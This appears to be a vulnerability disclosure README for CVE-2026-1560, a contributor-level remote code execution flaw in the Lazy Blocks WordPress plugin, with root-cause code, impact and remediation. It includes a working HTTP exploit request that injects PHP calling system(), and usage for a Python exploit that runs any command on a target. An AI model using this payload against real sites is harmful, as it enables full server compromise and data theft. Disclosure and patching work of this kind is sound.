# CVE-2026-1560 – Authenticated Remote Code Execution in Custom Block Builder – Lazy Blocks ≤ 4.2.0

**Researcher**: ZeYrOXxx

**Plugin**: Custom Block Builder – Lazy Blocks 

**Affected Versions**: ≤ 4.2.0  

**Severity**: High

**CVSS**: 8.8

**Vulnerability Type**: Authenticated Remote Code Execution (RCE) 

**Attack Vector**: REST API  

**Required Privilege**: edit_posts (Contributor+)  

---
## References

- Wordfence Advisory: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lazy-blocks/custom-block-builder-lazy-blocks-420-authenticated-contributor-remote-code-execution
---
## Executive Summary

A high security vulnerability was identified in the Custom Block Builder – Lazy Blocks WordPress plugin affecting versions up to and including **4.2.0**.  
The vulnerability allows authenticated users with low privileges (Contributor role) to execute **arbitrary PHP code** on the server via a REST API endpoint intended for block preview functionality.

This issue completely breaks WordPress’ privilege model and may lead to **full server compromise**.

---

## Vulnerable Endpoint

```
POST /wp-json/lazy-blocks/v1/block-builder-preview/
```

The endpoint is accessible to any authenticated user with the `edit_posts` capability.

---

## Technical Details

### Permission Check

The REST route is registered with a weak permission callback:

```php
'permission_callback' => array( $this, 'block_builder_preview_permission' )
```

This includes Contributors, who should never be allowed to execute PHP code.

---

### Vulnerable Code Path

**REST Controller – `classes/class-rest.php`**
```php
$block = $request->get_param( 'block' );

$block_result = lazyblocks()->blocks()->render_callback(
    $attributes,
    null,
    null,
    $context,
    $block_data
);
```

**Block Renderer – `classes/class-blocks.php`**
```php
public function php_eval( $code, $attributes, $context ) {
    ob_start();
    eval( '?>' . $code );
    return ob_get_clean();
}
```

The `eval()` function executes attacker-controlled PHP code without sanitization or validation.

---

## Root Cause Analysis

Lazy Blocks allows custom PHP rendering logic for blocks.  
The REST API preview endpoint accepts **user-supplied block definitions** and does not distinguish between trusted stored blocks and attacker-controlled preview blocks.

By injecting flattened block attributes such as:

- `code_output_method`
- `code_editor_html`

an attacker can reach the `php_eval()` execution sink and run arbitrary PHP code.

---

## Proof of Concept (HTTP)

**Request**:
```http
POST /wp-json/lazy-blocks/v1/block-builder-preview/ HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Basic [Contributor_Credentials]

{
    "context": "editor",
    "block": {
        "slug": "exploit-block",
        "code_output_method": "php",
        "code_editor_html": "<?php echo 'VULNERABLE: ' . system('id'); ?>"
    }
}
```

**Response**:
```http
HTTP/1.1 200 OK
Content-Type: application/json

{
    "success": true,
    "response": "<div useBlockProps>VULNERABLE: uid=33(www-data)...</div>"
}
```


✔ Arbitrary command execution confirmed

---


This PoC is provided strictly for **security testing and research purposes**.

---

## Impact

An attacker with Contributor access can:

- Execute arbitrary system commands
- Read sensitive files (e.g., `wp-config.php`)
- Modify PHP source files
- Escalate privileges to administrator
- Fully compromise the WordPress instance

---

## Remediation

- Restrict PHP rendering to administrators only
- Remove usage of `eval()` on user-controlled input
- Prevent REST preview of blocks containing PHP code
- Require `manage_options` or `unfiltered_html` capability
- Replace PHP execution with safe templating mechanisms

---


## Usage (Python PoC)

### Requirements
- Python 3.x
- `requests` library
- Valid WordPress credentials with `edit_posts` capability (Contributor+)

### Install dependency
```bash
pip install requests
```

### Run the exploit
```bash
python3 poc.py <target_url> <username> <password> "<command>"
```

### Example
```bash
python3 poc.py https://victim.site contributor password "id"
```

If the target is vulnerable, the command output will be returned in the HTTP response.

> ⚠️ This proof-of-concept is intended **strictly for authorized security testing and research purposes**.
